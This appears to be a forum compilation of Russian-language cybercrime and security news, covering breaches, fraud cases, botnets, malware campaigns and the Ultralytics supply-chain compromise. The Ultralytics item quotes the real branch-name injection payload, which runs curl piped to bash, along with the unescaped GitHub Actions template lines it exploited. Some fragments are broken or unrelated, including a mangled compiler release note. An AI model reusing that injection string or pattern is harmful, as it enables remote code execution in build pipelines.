В последнее время члены команды Трампа подвергались атакам иностранных хакеров. Например, в прошлом месяце ФБР уведомило адвоката Тодда Бланша, выбранного на должность заместителя генерального прокурора, что его телефон был прослушан китайскими хакерами. Также стало известно, что Линдси Халлиган, еще один адвокат Трампа, стал жертвой иранской хакерской группы.
Кроме того, Дональд Трамп-младший сообщил, что был уведомлен ФБР о том, что он является одним из главных целей Ирана. Иранские хакеры неоднократно атаковали членов первой администрации Трампа и использовали украденные данные для попыток вмешательства в выборы 2020 года.
Иранские хакеры активно используют компрометированные аккаунты для атак на политиков и высокопрофильных фигур США, что подтверждает тенденцию к цифровому вмешательству в выборные процессы.
Источник: https://edition[.]cnn.com/2024/12/03/politics/kash-patel-targeted- iran-hack/index.html
Пользователь c ником «r_ocky.eth» лишился $2 500 из-за нейросети, которая
посетовала мошеннический сайт в ходе написания бота для платформы мем-токенов
на блокчейне Solana.
Потерпевший показал часть кода, где необходимо отправить закрытый ключ в API
по рекомендации чат-бота.
"Конечно, я совершил ошибку, потому что использовал основной кошелек Solana. Но когда вы спешите сделать много дел одновременно, легко ошибиться", — прокомментировал ситуацию бедолага.
— Как только горе-кодер запустил бота, тот сразу же перевел весь балик на кошелек скамерсанта. На предполагаемом адресе злоумышленника находится 5,72 SOL и 141 950 USDC.
Группа хакеров обнаружила уязвимость в приложении сервиса такси и реализовала схему, позволившую им украсть 4,6 миллиона рублей. Как сообщила в своем Telegram-канале официальный представитель МВД России Ирина Волк, найденная киберпреступниками уязвимость позволяла незаконно получать деньги, которые в качестве оплаты переводили пассажиры такси.
«В одной из социальных сетей фигуранты создали аккаунт, в котором предлагали перевозки с 50-процентной скидкой. Благодаря мошеннической схеме платежи пользователей поступали на счет одного из аферистов. За несколько месяцев незаконной деятельности ущерб превысил 4,6 миллиона рублей», — написала Волк.
К аресту подозреваемых привлекли сотрудников Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий (УБК) МВД и саратовскую полицию, а также спецназ Росгвардии. У них были найдены и изъяты компьютеры, ноутбуки, мобильные телефоны, сим-карты, банковские карты, а также 1,5 миллиона рублей.
Уголовное дело возбудили по части 4 статьи 159 УК РФ (мошенничество группой лиц или в особо крупном размере), обвиняемым грозит до 10 лет лишения свободы. Однако решения суда они будут дожидаться под домашним арестом.
sc: t.me/IrinaVolk_MVD/1234
Александр Клименко предстал перед судом в Сан-Франциско.
В Соединённых Штатах выдвинуто обвинение против гражданина Беларуси и Кипра по имени Александр Клименко за его участие в международной операции по отмыванию денег, полученных благодаря киберпреступлениям.
По данным Министерства юстиции США (DoJ), Клименко контролировал нелегальную биржу цифровых валют BTC-e, компанию по оказанию технологических услуг Soft-FX и финансовую компанию FX Open.
Обвинение утверждает, что через эти фирмы Клименко облегчал проведение транзакций, связанных с различными видами киберпреступлений, включая программы-вымогатели, кражу личных данных, незаконную торговлю наркотиками, мошенничество и взломы.
BTC-e, платформа для торговли криптовалютами, была изъята правоохранительными органами США в 2017 году после ареста её основателя Александра Винника в Греции. Министерство юстиции США заявило, что платформа использовалась для отмывания средств, украденных в результате взлома японской криптовалютной биржи Mt. Gox, а также для выплат в рамках операций с использованием вирусов- вымогателей Locky, Cerber, NotPetya, WannaCry и Spora.
Платформа имела заметное присутствие в США, но не была зарегистрирована как денежный сервис, не требовала верификации личности клиентов и не имела механизмов противодействия отмыванию денег.
«BTC-e предположительно способствовал транзакциям киберпреступников по всему миру и получал нелегальные доходы от многочисленных компьютерных вторжений и хакерских инцидентов, мошенничества с программами-вымогателями, схем кражи личных данных, коррумпированных государственных должностных лиц и сетей распространения наркотиков», — сообщили в Министерстве юстиций.
Ныне 42-летний Клименко управлял BTC-e с 2011 года по июль 2017 года до ареста Винника и последующего закрытия сайта. Согласно последним сообщениям, Клименко управлял и обслуживал серверы в США, поддерживающие работу BTC-e через свою компанию Soft-EX.
Мужчина был арестован по запросу Соединённых Штатов в Латвии 21 декабря 2023 года и впервые появился в суде Сан-Франциско 1 февраля. Официально Клименко обвиняется в заговоре с целью отмывания денег и ведении нелегального денежного бизнеса, за что ему грозит максимальное наказание в виде 25 лет тюремного заключения.
sc: justice[.]gov/opa/pr/foreign-national-charged-international-money- laundering-conspiracy-and-role-operation
В американском штате Пенсильвания готовится к передаче в суд дело группировки кардеров, состоящей из пяти человек. Они специализировались на краже персональных данных и кредитных карт, что позволило им стать богаче на два миллиона долларов.
«Это была тщательно продуманная схема, в ходе реализации которой мошенники выдавали себя за банковских служащих и клиентов финансовых организаций с целью получения личной информации. Я благодарю всех, кто участвует в продолжающемся расследовании, которое началось много месяцев назад и включало тщательный анализ банковских записей и транзакций», — констатировал генеральный прокурор штата Мичел Генри (Michelle Henry).
Возглавлял группировку 22-летний Тайриз Льюис (Tyreese Lewis). Трое его сообщников такого же возраста, еще одному — 19 лет. Льюис и его ближайший помощник снимали деньги со счетов или использовали украденные данные дебетовых карт для покупки подарочного пластика. Остальные участники тратили средства в универмагах, магазинах одежды и на заправочных станциях. Теперь глава группы помещен в тюрьму без возможности внесения залога.
Группа из разработчиков, продавцов и автоугонщиков угоняли только французские автомобили.
Власти Франции, Латвии и Испании арестовали 31 подозреваемого, предположительно причастного к краже автомобилей двух французских марок.
Преступники угоняли только автомобили, которые используют системы доступа и запуска без ключа. Для этого они использовали специальный инструмент для замены прошивки ПО автомобиля и обхода системы без ключа, чтобы открыть двери и угнать автомобиль.
Командование киберпространства Национальной жандармерии Франции (FNG) также захватило домен мошеннического ПО, используемого для взлома бесключевой технологии автомобилей.
В сообщении Европола говорится, что в результате скоординированных действий, проведенных 10 октября в 3-ех вовлеченных странах, был арестован 31 подозреваемый. Всего было проведено обысков в 22 местах и изъято преступных активов на сумму более 1 млн. евро. Среди арестованных есть разработчики ПО, реселлеры этого ПО и угонщики автомобилей, которые использовали этот инструмент для угона автомобилей.
Какие именно марки автомобилей были угнаны и как назывался домен с ПО, не сообщается.
source: europol.europa.eu/media-press/newsroom/news/31-arrested-for-stealing- cars-hacking-keyless-tech
Сотрудник HackerOne украл отчеты об уязвимостях, отправленные через платформу Bug Bounty, и пытался получить денежное вознаграждение у клиентов платформы.
Мошенник связался с несколькими клиентами HackerOne и получил вознаграждение «за несколько уязвимостей».
HackerOne — это bug bounty платформа, соединяющую бизнес и исследователей безопасности. HackerOne является одной из первых компаний, которая использует хакеров в рамках своей бизнес-модели.
22 июня HackerOne ответила на запрос клиента о расследовании раскрытия подозрительной уязвимости через канал связи вне платформы от пользователя под ником «rzlr». Клиент заметил, что такая же проблема безопасности ранее была отправлена через HackerOne.
Коллизии ошибок, когда несколько исследователей обнаруживают и сообщают об одной и той же проблеме безопасности, случаются часто - в этом случае подлинный отчет и отчет от злоумышленника имели очевидные сходства, которые побудили к более внимательному расследованию инцидента.
Расследование HackerOne установило, что один из ее сотрудников имел доступ к
платформе с 4 апреля по 23 июня, и связался с семью компаниями, чтобы сообщить
об уязвимостях, уже обнаруженных в системе.
Злоумышленник смог получить вознаграждение за некоторые отчеты. HackerOne
проследил денежный след и идентифицировал преступника как одного из своих
сотрудников, который занимался раскрытием информации об уязвимостях.
В результате, — по словам HackerOne, — им пришлось признать инцидент. Компани уверена, что перекрыла инсайдерский доступ. Внутренние угрозы — одни из самых коварных в кибербезопасности, и мы готовы сделать все, что в наших силах, чтобы уменьшить вероятность подобных инцидентов в будущем, сообщили в компании.
действия ](https://tass.ru/politika/13215791)
Андрей Крутских заявил, что "переговоры с американской стороной по вопросам безопасности в киберпространстве идут очень сложно"
tass.ru
List of stolen tokens :
Bitmart's official announcement : <https://support.bmx.fund/hc/en- us/articles/4411998987419>
Сегодня администрация «Хабра» сообщила,
что 8 сентября ботнет Mēris атаковал инфраструктуру ресурса.
Напомню, что об этом ботнете вчера детально
рассказали специалисты «Яндекса» и Qrator
Labs. Именно этот ботнет ответственен за мощнейшие DDoS-атаки последнего
времени, пиковая мощность которых составляла 17,2 и 21,8 млн запросов в
секунду, что является новым рекордом.
Как сообщается теперь, DDоS-атака на «Хабр» длилась всего 90 секунд — с
15:29:30 по 15:31:00 по московскому времени. Она была отражена силами Qrator
Labs поэтому никаких проблем не заметили ни пользователи ресурса, ни даже
администрация «Хабра» (которая тоже узнала о случившемся уже постфактум).
Пиковая мощность атаки достигала почти 367 000 RPS (запросов в секунду), судя
по графику с усреднением по 30 секунд, тогда как на графике с усреднением по 1
секунде пик атаки достиг 769 000 RPS.
Суммарно за время атаки боты выполнили около 12 млн запросов, и аналитики
Qrator Labs полагают, что максимальная мощность атаки могла достигнуть 3,5 млн
запросов в секунду (исходя из количества трафика).
По итогам атаки Qrator Labs заблокировала 20 013 зараженных устройств, большая
часть их которых находила на территории Бразилии, Индонезии, Индии, Ирака,
Украины, Бангладеш, России, Польши, США, Камбоджи, Колумбии и Китая.
Также стоит отметить, что эксперты считают, что ботнет в основном состоит из
устройств латвийской компании Mikrotik. При этом специалисты «Яндекса» и
Qrator Labs писали, что проблема не просто в какой-то старой уязвимости в
устройствах Mikrotik. Дело в том, что текущее распределение по версиям
RouterOS в ботнете указывает, что заражены многие девайсы, использующие ОС
последних трех лет – вплоть до последней, стабильной версии. Наибольшая доля
приходится и вовсе на предпоследнюю версию.
Сегодня представители Mikrotik опубликовали официальное
заявление,
относительно ботнета Mēris:
«Многие из вас спрашивают, что это за ботнет Mēris, о котором сейчас говорят новостные издания, и есть ли какая-то новая уязвимость в RouterOS.
Насколько нам известно, в этих атаках используются те же маршрутизаторы, которые были взломаны еще в 2018 году, когда в MikroTik RouterOS была найдена уязвимость, которая была быстро исправлена.
К сожалению, исправление уязвимости не сразу защитило маршрутизаторы. Если кто-то узнал ваш пароль в 2018 году, то простое обновление не поможет. Вы также должны сменить пароль, перепроверить свой брандмауэр, чтобы он не разрешал удаленный доступ неизвестным лицам, и поискать скрипты, которых вы не создавали.
Мы пытались связаться со всеми пользователями RouterOS по этому поводу, но многие из них не вышли на связь с MikroTik и не следят за своими устройствами. Сейчас мы ищем другие решения.
Насколько нам известно, на данный момент в этих устройствах нет новых уязвимостей. Недавно RouterOS прошла независимый аудит, которые провели нескольких сторонних подрядчиков.
Если вы обнаружите устройство RouterOS с вредоносными скриптами или конфигурацией SOCKS, созданной не вами, особенно если эта конфигурация появилась только что, недавно, при работе с новой версией RouterOS: пожалуйста, немедленно свяжитесь с нами.
Если точнее, мы предлагаем отключить SOCKS и заглянуть в System -> Scheduler. Отключите все правила, которые вы не сумеете узнать. По умолчанию, в планировщике не должно быть правил, а SOCKS должен быть выключен».Click to expand...
Источник: https://xakep.ru/2021/09/10/meris-habr/
В Самаре будут судить 37-летнего директора строительной компании. Он решил разнообразить род деятельности и заняться майнингом.
— В начале октября 2023 года фигурант вступил в преступный сговор с неустановленными лицами и арендовал несколько помещений в здании одного из предприятий на улице Ново-Садовой. Там он оборудовал майнинговые фермы по добыче криптовалюты, подключив специализированное оборудование к местным электросетям. При этом приборы учёта энергии были запрограммированы на занижение показаний расхода электричества, — рассказали в ГУ МВД России по Самарской области.
Бывшего ИТ-директора крупного университета хотят посадить на 20 лет за обман руководства и поставщиков, в результате которого он за пять лет превратился в миллионера. Хитрый топ-менеджер перепродавал казенные компьютеры и наживался на этом годами.
Сума и тюрьма
Бывший ИТ-директор Вебстерского университета (Webster University, США, штат Миссури) Рональд Симпсон (Ronald Simpson) попался на невероятно крупной мошеннической схеме. The Register пишет, что он на протяжении нескольких лет по-крупному обманывал руководство университета и перепродавал закупаемое на нужды вуза компьютерное оборудование. Поставщика «железа» он тоже оставлял в дураках, заявляя ему, что поставленные им ранее ПК были бракованными, и требуя новую поставку.
Придуманная и реализованная Симпсоном схема принесла ему очень крупный доход – за пять лет его личный капитал увеличился на $2,1 млн или свыше 182,77 млн руб. по курсу ЦБ на 19 июня 2024 г.
Но обман Симпсона в итоге все равно вскрылся, в результате чего теперь его дальнейшая жизнь на свободе оказалась под большим вопросом. 54-летний бывший ИТ-директор уже признал себя виновным и теперь рискует провести следующие 20 лет в тюрьме и выйти из нее уже стариком. Приговор будет вынесен в сентябре 2024 г. Альтернативным наказанием для него может стать штраф в размере $250 тыс., или же суд может приговорить его одновременно и к штрафу, и к тюремному заключению.
Работа и «подработка»
В рамках своей работы в университете Симпсон отвечал, помимо прочего, за ремонт и замену неисправного ИТ-оборудования. Вебстерский университет регулярно приобретал компьютерное оборудование у компании под названием CSI, которую в судебных документах описывают как «компанию, которая производит, продает и поддерживает компьютерное сетевое оборудование в глобальном масштабе» (a company that manufactures, sells, and supports computer networking equipment on a global scale).
По соглашению между CSI и вузом производитель готовых компьютерных сборок отправлял бы университету новые ПК на замену имеющимся, в случае выполнения двух условий. От университета требовалось, во-первых, «правдиво заявить» (truthfully represent), что его нынешнее оборудование неисправно, во-вторых, «правдиво пообещать» (truthfully promise) вернуть дефектный комплект в CSI.
По информации The Register, Симпсон, «правдиво заявляя» и не менее «правдиво обещая», реализовывал свою схему и набивал собственные карманы с конца ноября 2018 г. и вплоть до конца 2023 г. Пользуясь своим служебным положением, Симпсон направлял официальные запросы руководству вуза на покупку сотен единиц компьютерного оборудования, и в каждом из них он утверждал, что эти ПК будут использоваться в университетах.
Затем Симпсон по назначению использовал выделенные университетом деньги, то есть действительно закупал технику, но вместо того, чтобы установить ее в стенах вуза, он продал «железо» третьим лицам без какого-либо на то разрешения. Покупатели переводили оплату за товар на личные банковские счета Симпсона.
«В общей сложности университет потратил не менее $1 млн на ИТ-оборудование на основании существенного искажения ответчиком фактов о том, что запрошенное ответчиком ИТ-оборудование будет использоваться или устанавливаться на территории университета, – говорится в судебных документах. – Вместо того, чтобы использовать или устанавливать ИТ-оборудование в университетах, ответчик продал ИТ-оборудование для собственного обогащения».
Симпсон также «обманным путем получил» 56 экземпляров техники от CSI, которые затем продал и получил прибыль, ложно заявив, что университетское ИТ- оборудование было дефектным. Об этом сам Симсон заявил в своем признании вины.
На основании его лжи CSI отправила Симпсону технику на замену на сумму $780,233 тыс. Те, кто купил у него все это «железо», перевели ему в общей сложности $2,1 млн.
Название вуза не раскрывается
В имеющихся в открытом доступе судебных документах название учебного заведения, обманутого Сипсоном, не раскрывается. Однако это, скорее всего, был именно Вебстерский университет – эксперты The Register выяснили это и дополнительно заручились официальным подтверждением представителей вуза.
Симпсон занимал в этом университете должность директора по информационным технологиям на протяжении нескольких последних лет. Его уволили лишь в осенью 2023 г., сразу после того, как администрации университета (авторы материала в The Register упорно называют его школой) узнали о столь крупной краже.
«Хотя мы не можем комментировать продолжающееся правоохранительное разбирательство, преступления, в которых Симпсон признал свою вину, представляют собой преднамеренный обман и преднамеренные нарушения многочисленных политик и процедур, которым он был обязан следовать, – заявил изданию пояснил представитель университета. – Мы с нетерпением ждем решения этого вопроса через систему правосудия».
Неуемная жажда наживы
Случай Вебстерского университета – один из многих похожих, произошедших в США за последние годы. Очень много сотрудников вузов пытаются тайно увеличить свою зарплату путем реализации схем по краже и перепродаже закупаемой госучреждением техники.
Например, в начале 2022 г. CNews освещал историю теперь уже бывшей учительницы одной из школ штата Нью-Мехико Кристи Сток (Kristy Stock), которая занималась кражей оборудования даже дольше, чем Симпсон. Она на протяжении шести лет воровала плееры Apple iPod, которые предназначались для обучения коренных американцев математике и чтению.
46-летняя на тот момент Кристи Сток лично руководила крупномасштабной программой по закупке этих плееров. За годы своей деятельности она украла около 3000 этих устройств, на чем смогла заработать около $1 млн. Но, в отличие от Симпсона, перспектива провести 20 лет жизни в тюрьме ей не грозила – ее приговорили лишь к полутора годам заключения.
The AhnLab Security Intelligence Center (ASEC) has detected a sophisticated cyberattack targeting users of the popular text and code editor, Notepad++. Hackers manipulated a default plugin within Notepad++, "mimeTools.dll," potentially compromising numerous systems. This exploit, known as DLL Hijacking, allows attackers to execute hidden malware upon launching Notepad++. The malware, embedded within the altered plugin, includes encrypted shell code and communicates with a command and control (C2) server. The server, initially disguised as a Wiki site, can facilitate further malicious activities. Although the current payload is empty, the threat remains as attackers can update it anytime. ASEC advises users to download software from official sources, conduct system scans, and stay informed about cybersecurity threats. They also provide indicators of compromise (IoCs) for users to check their systems.
Reference Link: [Hackers Hijacked Notepad Plugin to Execute Malicious Code](https://gbhackers.com/hackers-hijacked-notepad-plugin-to-execute- malicious-code)
Московский городской суд вынес приговор по делу хакера, взломавшего IT-системы медицинской лаборатории «Гемотест». Согласно приговору , суд назначил взломщику наказание по ч.3 ст.272, ч.2 ст.273 УК РФ в виде 1,5 лет условно.
Хакер получил доступ к данным с помощью скомпрометированной учетной записи gms-admin@gemotest.ru и PHP-скриптов (1650553341626171fd617886.05693802.php, db-informations.php, php- informations.php), в том числе через веб-шелл p0wny-shell и форму загрузки видео на веб-сервисе лаборатории «Корпоративное ТВ» (corptv.gemotest.ru). С 21 апреля по 3 мая 2022 года хакер и неустановленные лица, используя эти скрипты, осуществили выгрузку данных из баз данных лаборатории.
В экспертном заключении №001/23 от 15 мая 2023 года было выявлено, что с 21 апреля по 3 мая 2022 года производились запросы к PHP-скрипту «db- informations.php». Запросы содержали информацию, включая имена пользователей и наименования баз данных и таблиц.
Из анализа запросов со статусом «200», обозначающим успешное их выполнение, эксперт выявил, что запросы от пользователя «итр-корптв» («itr-corptv») направлялись к базам данных «ОрдерсФромКЭШ» («OrdersFromCACHE») и «МИС» («MIS»). Согласно лог-файлам, данные из запросов отправлялись на IP-адрес 10.132.132.132, который, вероятно, является частью локальной сети, связывающей веб-сервер, размещенный на виртуальной машине, с глобальной сетью Интернет.
По данным Telegram-канала «Утечки информации», Алекперов Фуад Маариф оглы, признанный виновным в суде по этому делу, возможно участвовал в других известных случаях взлома и распространения персональных данных клиентов различных компаний.
3 мая 2022 года сервис DLBI сообщил об утечке базы данных клиентов «Гемотест», содержащей персональные данные и результаты анализов. Позже эксперты DLBI выяснили, что утечка произошла из-за уязвимости IT-системы лаборатории.
«Гемотест» начал расследование инцидента 4 мая, а Роскомнадзор обратился в прокуратуру. 18 мая лаборатория подтвердила взлом, уточнив, что утечка меньше, чем сообщалось в интернете. 25 июля Мировой суд Москвы оштрафовал «Гемотест» на 60 тыс. рублей за утечку 300 ГБ данных клиентов.
По мнению Роскомнадзора, инцидент произошёл из-за компрометации учётной записи сотрудника, что позволило хакерам выгрузить данные. На суде представители лаборатории признали факт хакерской атаки, но отрицали свою вину и просили прекратить дело.
Суд Костаная рассматривает уголовное дело в отношении создателя криптовалютного обменника kzobmen.com, оказывавшего услуги без лицензии. Об этом сообщают местные СМИ.
По версии обвинения, сервис позволял физическим лицам покупать и продавать цифровые активы после указания личных данных. При этом он не был зарегистрирован в МФЦА.
Доход от нелегальной деятельности составил 3,9 млрд тенге ($8,1 млн) и более $2000.
Подсудимый — 35-летний гражданин РФ с видом на жительство в Казахстане. Он зарегистрирован на территории страны в качестве индивидуального предпринимателя. Свою вину полностью не признал.
Судебное разбирательство продолжается.
source: tengrinews.kz/kazakhstan_news/rossiyanin-sozdal-sayt-kriptovalyutyi- popal-sud-kostanae-514013/
7 августа вышла новая версия Glasgow Haskell Compiler 9.4.1. На данный момент
GHC является самым активно развиваемым компилятором для Haskell.
Среди изменений:
\cases
, аналогичный \case
из LambdaCase, и позволяющий проводить сравнение с образцом более чем одного аргумента.-fprof-late
. Этот режим гораздо меньше конфликтует с различными оптимизациями кода, применяемыми компилятором.В дополнении к этому, вышла новая версия в ветке 9.2 – GHC 9.2.4, в которой также возвращена поддержка deep subsumption и исправлены многие баги.
Теперь исследователи могут сообщать об уязвимостях во всех общедоступных сетях Пентагона, в том числе в системах радиосвязи, IoT и АСУ ТП.
Министерство обороны США объявило о расширении своей программы раскрытия уязвимостей (Vulnerability Disclosure Program) – теперь она распространяется и на все публично доступные информационные системы министерства.
Программа «вытекает» из запущенной пять лет назад инициативы «Взломай Пентагон» (Hack the Pentagon). В 2016 году Эштон Картер (Ashton Carter), в то время занимавший пост министра обороны США, встретился с двумя хакерами, чтобы выразить им благодарность за сообщение об опасных уязвимостях на нескольких сайтах Пентагона. Эти хакеры были самыми успешными участниками проекта «Взломай Пентагон», ставшего первой программой bug bounty Минобороны. До того никакой возможности связаться с Пентагоном и сообщить об уязвимостях в его системах у исследователей безопасности не было.
«Из-за этого многие уязвимости остались невыявленными. Политика уязвимостей Министерства обороны США была запущена в 2016 году, когда мы продемонстрировали эффективность работы с хакерским сообществом и даже наняли хакеров для поиска и исправления уязвимости в системах», – сообщил директор цифровой службы обороны (Defense Digital Service) Бретт Голдштейн (Brett Goldstein).
Реализацией программы раскрытия уязвимостей занимается Центр борьбы с киберпреступностью Минобороны (Cyber Crime Center). За все время существования программы Пентагон получил от исследователей 29 тыс. сообщений об уязвимостях, и 70% из них были подтверждены.
Изначально программа ограничивалась только общественными сайтами и приложениями Минобороны, но теперь исследователи безопасности могут сообщать об уязвимостях во всех его общественно доступных сетях, в том числе в системах радиосвязи, IoT и промышленных системах.
Группировка UNC2529 атаковала фишинговыми письмами около 50 организаций по всему миру.
Преступники организовали масштабную фишинговую кампанию против организаций из самых разных отраслей в странах по всему миру с использованием новых видов вредоносных программ. По словам специалистов из компании Mandiant, атаки затронули не менее 50 организаций и проходили в два этапа — 2 декабря и с 11 по 18 декабря прошлого года.
Группировка UNC2529, стоящая за этой кампанией, с помощью специальных фишинговых приманок заражала компьютеры жертв тремя новыми вредоносными программами.
«Злоумышленники использовали методы обфускации и бесфайловые вредоносные программы, чтобы усложнить обнаружение и создать хорошо закодированный и расширяемый бэкдор», — пояснили эксперты.
В ходе атак группировка использовала фишинговые электронные письма со ссылками на JavaScript-загрузчик (получивший название DOUBLEDRAG) или документ Microsoft Excel со встроенным макросом, который устанавливал загрузчик на основе PowerShell (DOUBLEDROP) с C&C-сервера злоумышленников. После запуска DOUBLEDRAG обращается к C&C-серверу и устанавливает загрузчик в память системы. DOUBLEDROP реализован в виде PowerShell-скрипта, который содержит как 32-битные, так и 64-битные экземпляры бэкдора DOUBLEBACK. Загрузчик выполняет начальную настройку и обеспечивает персистентность бэкдора на скомпрометированной системе.
Бэкдор внедряется в PowerShell-процесс загрузчика и позже попытается внедрить себя во вновь созданный процесс установщика Windows (msiexec.exe), если антивирусное ядро Bitdefender не запущено на скомпрометированном компьютере. На следующем этапе бэкдор DOUBLEBACK загружает плагин и обращается к C&C-серверу в ожидании команд.
«Интересный факт об инфраструктуре вредоноса заключается в том, что в файловой системе существует только загрузчик. Остальные компоненты сериализованы в базе данных реестра, что несколько затрудняет их обнаружение, особенно файловыми антивирусными механизмами», — отметили эксперты.
UNC2529 в рамках фишинговой кампании задействовала примерно 50 доменов. Письма отправлялись якобы от имени руководителей компаний и были нацелены на медицинскую промышленность, производителей высокотехнологичной электроники, автомобилей и военного оборудования, а также на оборонного подрядчика. Хотя основной целью киберпреступников были компании в США, атаке также подверглись организации из EMEA (Европа, Ближний Восток и Африка), Азии и Австралии.
Разработчики Google сообщили, что из соображений конфиденциальности и безопасности планируют запретить приложениям «видеть», что еще установлено на том же устройстве.
Дело в том, что разработчики нередко злоупотребляют этим: узнают, какие приложения пользователи установили на свои устройства, и продают эту информацию рекламодателям, которые позже используют ее для показа целевой рекламы. Впервые об этом проблеме заговорили в прошлом году, когда группа ученых из университетов Швейцарии, Италии и Нидерландов представила соответствующий доклад на выставке MOBILESoft.
Теперь в Google заявили, что отныне рассматривают «перечень установленных приложений, запрошенных с устройства пользователя, как личную и конфиденциальную информацию», и будут бороться с приложениями, злоупотребляющими этим для получения выгоды.
Нововведение вступит в силу 5 мая 2021 года. По сути, после этой даты разработчики приложений для Android не смогут загружать в Play Store новые приложения, предназначенные для Android 11 или более поздней версии и использующие функцию QUERY_ALL_PACKAGES.
Данную функцию признали слишком высокорисковой, и лишь избранным приложениям будет разрешено ее использовать. Например, тем, которые выполняют операции поиска устройств, антивирусам, файловым менеджерам и браузерам. Другие приложения, такие как цифровые кошельки и приложения электронного банкинга, тоже смогут получить доступ к необходимому разрешению, но только если это необходимо в целях безопасности.
Источник: xakep.ru/2021/04/06/query_all_packages/
Издание ZDNet сообщает, что на этой неделе Proofpoint подала иск против Facebook, так как социальная сеть пытается конфисковать доменные имена, которые ИБ-компания использует в рамках ознакомительной подготовки, призванной повысить осведомленности о фишинге.
Встречный иск к Facebook связан с тем, что 30 ноября 2020 года социальная сеть создала запрос UDRP (Uniform Domain-Name Dispute-Resolution), чтобы вынудить регистратора доменных имен Namecheap передать ей контроль над рядом доменных имен, которые имитировали бренды Facebook и Instagram. Речь идет о таких доменах, как facbook-login.com, facbook-login.net, instagrarn.ai, instagrarn.net и instagrarn.org.
В своем иске Proofpoint объясняет, что применять UDRP к этим доменам не следует, ведь компания использовала домены, имитирующие Facebook и Instagram, «добросовестно и в законных целях». ИБ-эксперты пишут, что тесты на осведомленность о фишинге имеют решающее значение для безопасности клиентов компании и даже для безопасности самой Facebook, ведь они учат пользователей распознавать фейковые сайты (в том числе, имитирующие Facebook и Instagram), а также фишинговые атаки в целом. От чего Facebook тоже выигрывает, пусть и косвенно.
Кроме того, пользователи, которые переходят по ссылкам из «фишинговых тестов» Proofpoint, всегда получают уведомление о том, что они выполнили нежелательное действие, однако учетные данные от их аккаунта в Facebook при этом не пострадали. Также на этих сайтах объясняется, что они принадлежат Proofpoint и созданы в образовательных целях, для обучения сотрудников.

Источинк: xakep.ru/2021/02/11/proofpoint-vs-facebook/
Злоумышленники [смогли](https://blog.yossarian.net/2024/12/06/zizmor- ultralytics-injection) выполнить код с правами обработчика GitHub Actions в репозитории Python-библиотеки Ultralytics, применяемой для решения задач компьютерного зрения, таких как определение объектов на изображениях и сегментирование изображений. После получения доступа к репозиторию атакующие опубликовали в каталоге PyPI несколько новых релизов Ultralytics, включающих вредоносные изменения для майнинга криптовалют. За последний месяц библиотека Ultralytics была загружена из каталога PyPI более 6.4 млн раз.
Для компрометации репозитория была задействована уязвимость в пакете ultralytics-actions, применяемом для автоматического запуска обработчиков при совершении определённых действий с репозиторием на GitHub, используя механизм GitHub Actions. В проекте ultralytics уязвимый обработчик привязывался к событию pull_request_target и вызывался при поступлении новых pull-запросов. В частности, для форматирования кода в присылаемых pull-запросах вызывался обработчик format.yml и выполнялся код, указанный в секции "run" файла action.yml, в котором присутствовали shell-команды с шаблонами подстановки:
Code:Copy to clipboard
git pull origin ${{ github.head_ref || github.ref }}
git config --global user.name "${{ inputs.github_username }}"
git config --global user.email "${{ inputs.github_email }}"
Таким образом, в shell-команды без должного экранирования подставлялось название Git-ветки, упоминаемой в pull-запросе. Примечательно, что в августе в пакете ultralytics-actions уже исправлялась похожая уязвимость, связанная с использованием внешнего значения в функции echo:
Code:Copy to clipboard
echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"
Для организации выполнения своего кода в контексте обработчика GitHub Actions атакующие отправили pull- запрос в репозиторий ultralytics, указав в качестве имени ветки:
Code:Copy to clipboard
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Соответственно, при поступлении pull-запроса в код подставилась заданная атакующими строка "$(...)", которая при при последующем запуске обработчика привела к выполнению кода "curl -sSfL raw.githubusercontent.com/.../file.sh | bash".
Запуск кода в контексте GitHub Actions может использоваться для захвата токена доступа к репозиторию и других конфиденциальных данных. Как именно атакующим удалось сформировать релиз, получив возможность выполнения своего кода в GitHub Actions, пока точно не ясно, предполагается, что это стало возможным благодаря изменению обработчика publish.yml (атакующие убрали проверку учётной записи с которой разрешено публиковать релизы в PyPI) и использованию техники [отравления сборочного кэша](https://adnanthekhan.com/2024/05/06/the-monsters-in-your- build-cache-github-actions-cache-poisoning/) GitHub Actions для подстановки своих данных в релиз.
Первый вредоносный релиз Ultralytics 8.3.41 был опубликован злоумышленниками в каталоге PyPI 4 декабря в 23:51 (MSK) и удалён в 12:15 на следующий день. В 15:47 был размещён ещё один релиз 8.3.42, который был удалён в 16:47. Таким образом вредоносные версии в общей сложности были доступны для загрузки около 13 часов (в день в PyPI фиксируется около 250 тысяч загрузок библиотеки ultralytics). В составе выпусков 8.3.41 и 8.3.42 присутствовал код, осуществляющий загрузку с внешнего сервера компонента XMRig для майнинга криптовалюты.
Разработчики проекта устранили проблему и сформировали корректирующие релизы 8.3.43 и 8.3.44, но спустя два дня была совершена ещё одна атака, в ходе которой злоумышленники опубликовали сегодня в 04:41 и 05:27 (MSK) два дополнительных вредоносных релиза - 8.3.45 и 8.3.46, включающих другой код для майнинга. До окончания разбирательства пользователям рекомендуется повременить с установкой новых версий и зафиксировать в зависимостях выпуск 8.3.44.
Эксперты ФСБ порекомендовали организациям отказаться от использования российского браузера «Спутник». Разработчик обанкротился, а доменное имя выкупила американская компания. «Спутник» запустили в 2015-м году. Он должен был стать государственным поисковиком, альтернативой Google.
Отечественный браузер «Спутник», разработанный компанией ООО «Спутниклаб», получил массовое применение в государственных организациях и органах государственной власти за счёт поддержки отечественных SSL-сертификатов и нахождения в реестре программного обеспечения Минцифры России.
В 2023 году ООО «Спутниклаб» признано несостоятельным (банкротом). После этого компания подала запрос на исключение браузера «Спутник» из реестра ПО Минцифры России, и 7 марта 2024 г. он был исключён из него. Техническая поддержка браузера «Спутник» прекратилась в 2022 году, а доменное имя browser- sputnik[.]ru, к которому обращались экземпляры программы для получения обновлений, стало доступным для продажи в связи с истечением срока регистрации.
В настоящее время доменное имя browser-sputnik[.]ru принадлежит американской компании Global Internet Telemetry Measurement Collective, используется ей в неизвестных целях, а ассоциированный с доменным именем веб-сервис принимает от установленных на СВТ российских граждан браузеров «Спутник» запросы на получение обновлений.Таким образом, существует угроза внедрения в программное обеспечение «Спутник» вредоносных модулей с целью компрометации СВТ.
Таким образом, существует угроза внедрения в программное обеспечение «Спутник» вредоносных модулей с целью компрометации СВТ.
